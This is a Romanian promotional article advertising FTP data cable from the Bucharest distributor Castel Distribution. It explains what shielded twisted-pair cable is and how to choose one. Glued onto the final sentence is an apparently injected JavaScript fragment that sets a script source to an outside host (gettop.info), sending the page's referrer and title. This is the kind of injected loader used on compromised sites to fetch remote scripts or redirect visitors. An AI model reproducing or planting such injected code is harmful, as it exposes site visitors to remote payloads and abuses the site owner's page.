logoAi nevoie de cablu date FTP pentru computere, retele de date, sisteme de telecomunicatii sau pentru a transmite semnalul in supravegherea video si nu stii de unde l-ai putea achizitiona? Iti spunem noi! Cablu date FTP gasesti in oferta celor de la Castel Distribuiton din Bucuresti. Principalul domeniu de activitate al acestei companii consta in distributia de instalatii catre segmente multiple: retail, residential si industrial de talie mica sau mijlocie.

De la Castel Distribuition ai posibilitatea de a achizitiona o varietate de produse printre care mentionam de: prize UTP, cablu electric, baterii, prize de pamant, sisteme paratraznet, acumulatori stationari, alarma incendiu, cablu incendiu etc. Indiferent de necesitatile personale, vizualizeaza oferta acestei companii si, cu siguranta, vei gasi aici produsele de care ai mare nevoie.

Cum intri in posesia unui cablu date FTP de la Castel Distribution? Foarte simplu! Prin cateva click-uri poti trimite o comanda online urmand ca, in cel mai scurt timp, aceasta sa ajunga la domiciliul personal. Niciodata nu a fost mai simplu sa achizitionezi un cablu date FTP!

Sa aflam mai multe despre cablu date FTP!

Cablurile de date FTP sunt produse deosebit de utilizate in domeniul spravegherii si securitatii video, telefoniei si internetului. Un cablu date FTP este un cablu UTP a carui conductori sunt inveliti intr-o folie exterioara ce are scopul de a proteja impotriva interferentelor externe. De asemeni, aceasta folie mai indeplineste si rolul de conductor de impamantare. Cablurile FTP sunt utilizate in retelele de calculatoare si mai sunt cunoscute sub denumirea de cablu cu perechi rasucite in folie. Acesti conductor sunt rasuciti unul in jurul celuilalt pentru a diminua interferenta asupra calitatii transmisiei a campurilor magnetice din exterior. Pentru transmiterea semnalului, pe langa cablu date FTP , se mai utilizeaza si cablu coaxial, cablu  RCA, cablu STP, cablu UTP si fibra optica (utilizata in cazul distantelor foarte mari). Dintre toate aceste tipuri de produse, cel mai utilizat este cablul FTP datorita pretului avantajos si pierderilor reduse de semnal.

Cum alegi un cablu date FTP ideal?

Pentru a alege un cablu date FTP care sa se potriveasca nevoilor tale trebuie sa tii cont de aspecte precum: frecventa semnalului transmis, lugimea cablului, calitatea cablului, umiditatea mediului in care este folosit si rezistenta cablului impotriva factorilor de mediu.

Cablu date FTP doar de la Castel Distribution!

Achizitioneaza cablu date FTP fie ca lucrezi in domeniul telefoniei sau calculatorelor, fie ca ei nevoie de acest produs pentru a solutiona anumite probleme de la domiciliu. Cu o experienta de peste 12 ani, aceasta companie pune la dispozitia clinetilor interesati doar produse de cea mai buna calitate. In oferta celor de la Casetel Distribution vei gasi cablu date FTP ce este perfect adaptat atat tehnologiei actuale, cat si exigentelor cu privire la rezistenta, randament si pret.

Pentru informatii suplimentare sau pentru a comanda cablu date FTP este nevoie doar sa accesezi site-ul www.castel.ro. De asemeni, echipa de specialisti de aici iti sta la dispozitie cu servicii gratuite de consiliere pentru ca alegerea ta sa fie perfecta!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;